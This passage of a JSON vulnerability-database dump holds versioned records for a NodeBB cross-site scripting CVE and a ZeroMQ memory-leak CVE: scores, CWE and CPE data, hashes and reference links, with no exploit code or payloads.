"1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T20:03:10", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-12-09T20:03:10", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [], "hash": "48b94d9acf0e692c61f3d939f819f0ddba91180b8a5c7286e7edbacc4207d0ed", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-12-09T20:03:10", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 6}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-12-09T20:03:10"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-30T00:13:43", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-11-30T00:13:43", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "6fe52c24d63e23f00822e673ee4063d867fb4719b46c47ea85a6bfe1400fe129", "hashmap": [{"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "71d5df73a226d76c990527e0ca95c8d8", "key": "affectedSoftware"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-11-30T00:13:43", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}], "ubuntucve": [{"id": "UB:CVE-2021-20234", "vendorId": null, "hash": "412c52db81067fca053960edb552882a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2021-20234", "description": "An uncontrolled resource consumption (memory leak) flaw was found in the\nZeroMQ client in versions before 4.3.3 in src/pipe.cpp. This issue causes a\nclient that connects to multiple malicious or compromised servers to crash.\nThe highest threat from this vulnerability is to system availability.", "published": "2021-04-01T00:00:00", "modified": "2021-04-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2021-20234", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20234", "https://github.com/zeromq/libzmq/pull/3918", "https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22037", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22123", "https://nvd.nist.gov/vuln/detail/CVE-2021-20234", "https://launchpad.net/bugs/cve/CVE-2021-20234", "https://security-tracker.debian.org/tracker/CVE-2021-20234"], "cvelist": ["CVE-2021-20234"], "immutableFields": [], "lastseen": "2021-11-22T21:22:09", "history": [{"bulletin": {"id": "UB:CVE-2021-20234", "vendorId": null, "hash": "50ab7231517a4537f6e8487c954d4602", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2021-20234", "description": "An uncontrolled resource consumption (memory leak) flaw was found in the\nZeroMQ client in versions before 4.3.3 in src/pipe.cpp. This issue causes a\nclient that connects to multiple malicious or compromised servers to crash.\nThe highest threat from this vulnerability is to system availability.", "published": "2021-04-01T00:00:00", "modified": "2021-04-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2021-20234", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20234", "https://github.com/zeromq/libzmq/pull/3918", "https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22037", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22123", "https://nvd.nist.gov/vuln/detail/CVE-2021-20234", "https://launchpad.net/bugs/cve/CVE-2021-20234", "https://security-tracker.debian.org/tracker/CVE-2021-20234"], "cvelist": ["CVE-2021-20234"], "immutableFields": [], "lastseen": "2021-06-30T21:26:25", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "redhatcve", "idList": ["RH:CVE-2021-20234"]}, {"type": "cve", "idList": ["CVE-2021-20234"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2588-1:2F08E"]}, {"type": "nessus", "idList": ["FEDORA_2021-8B3202B783.NASL", "DEBIAN_DLA-2588.NASL", "PHOTONOS_PHSA-2021-3_0-0253_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-1_0-0403_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-2_0-0357_ZEROMQ.NASL"]}], "modified": "2021-06-30T21:26:25", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-06-30T21:26:25", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "4.3.3-1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "20.10", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}], "bugs": []}, "lastseen": "2021-06-30T21:26:25", "differentElements": ["affectedPackage"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2021-20234", "vendorId": null, "hash": "2c64b22a06cb7b74abfe54c941025b6e", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2021-20234", "description": "An uncontrolled resource consumption (memory leak) flaw was found in the\nZeroMQ client in versions before 4.3.3 in src/pipe.cpp. This issue causes a\nclient that connects to multiple malicious or compromised servers to crash.\nThe highest threat from this vulnerability is to system availability.", "published": "2021-04-01T00:00:00", "modified": "2021-04-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2021-20234", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20234", "https://github.com/zeromq/libzmq/pull/3918", "https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22037", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22123", "https://nvd.nist.gov/vuln/detail/CVE-2021-20234", "https://launchpad.net/bugs/cve/CVE-2021-20234", "https://security-tracker.debian.org/tracker/CVE-2021-20234"], "cvelist": ["CVE-2021-20234"], "immutableFields": [], "lastseen": "2021-07-23T22:25:26", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20234"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-20234"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2021-2_0-0357_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-3_0-0253_ZEROMQ.NASL", 